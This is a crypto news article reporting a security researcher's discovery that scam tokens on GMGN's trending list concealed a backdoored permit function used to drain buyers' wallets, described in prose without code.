Scammers are using “trending” lists on memecoin analytics site GMGN to lure in unsuspecting victims and steal their cryptocurrency, according to a September 25 post on X from security researcher Roffett.eth.
The attackers created coins that allowed the developer to transfer any user’s Token to their account. They then transferred the Token between multiple accounts, artificially inflating the trading volume and placing it on GMGN’s “trending” list.
Once the coin appears on the trending list, unsuspecting users buy it, thinking it is a popular coin. But within minutes, their tokens are taken from their wallets, never to be seen again. The developer then reloads the coin into the liquidity pool and resells it to another victim.
Roffet lists Robotaxi, DFC, and Billy’s Dog (NICK) as three examples of malicious coins found on this list.
GMGN is an analytics app aimed at memecoin traders on Base, Solana, Tron, Blast, and Ethereum. Its interface consists of several tabs, including “new pair,” “trending,” and “discover,” each of which lists coins based on different criteria.
See also: Trump is silent on crypto, SEC needs to clarify about Airdrop
Roffett said he discovered the scam technique when friends bought coins from the list and found them mysteriously disappearing. One friend thought his wallet had been hacked, but when he created a new wallet and bought the coins again, they were drained.
Intrigued by the mystery, Roffett investigated the attacks using a block explorer and found that they were routine phishing attacks. The attacker called the “permit” function and appeared to provide the user’s signature, which would not have been possible unless the user had been tricked by the phishing site. However, the friend denied interacting with the suspicious sites before either attack.
One of the stolen coins was NICK. Roffet investigated NICK’s contract code and found it to be “a little strange.” Instead of containing common code like most other Token contracts, it had “some very strange and secret methods.”
As evidence of these strange methods, Roffet posted an image of NICK's “performance” and “novel” functions, with unclear and non-typically purposeful text fragments.
See also: Bitcoin and Binance drop slightly as CZ is released
Roffett eventually discovered that the contract had malicious code hidden inside one of its libraries that allowed the “recoverer” (developer) to call the “permit” function without providing the Token owner’s signature. Roffett stated:
“If the caller address is equal to the recoverer, then by manually creating a specific signature, one can obtain the permissions of any Token owner and then transfer the Token.”
However, the address of the recoverer is also obscured. It is listed as a positive 256-bit number, not zero. Just below this number is a function that the contract uses to derive the address from this number. Roffett used this function to determine that the malicious “recoverer” is a contract with an address ending in f261.
Blockchain data shows that this “recoverer” contract has made more than 100 transactions transferring NICK from Token holders to other accounts.
After discovering how the scam worked, Roffett investigated the “trends” list and found at least two other Tokens containing similar code: Robotaxi and DFC.
See also: RDNT price surges 20% after new liquidity plan
Roffett concluded that scammers have likely been using this technique for a long time. He warned users to stay away from this list, as using it could lead to loss of money. He said:
“The malicious developers first used multiple addresses to simulate transactions and holding, pushing the Token into the trending list. This attracted retail investors to buy, and eventually, the ERC20 Tokens were stolen, completing the scam. The existence of these trending lists is very harmful to new retail investors entering the market. I hope everyone will be aware of this and not be fooled.”
Scam tokens or “honeypots” continue to pose a risk to cryptocurrency users. In April, a scam token developer siphoned $1.62 million from victims by selling them BONKKILLER tokens without allowing them to sell them. In 2022, blockchain risk management firm Solidus released a report warning that more than 350 scam coins were created during the year.
#tintucbitcoin #Write2Win #AirdropGuide #TopCoinsJune2024 #BinanceTurns7
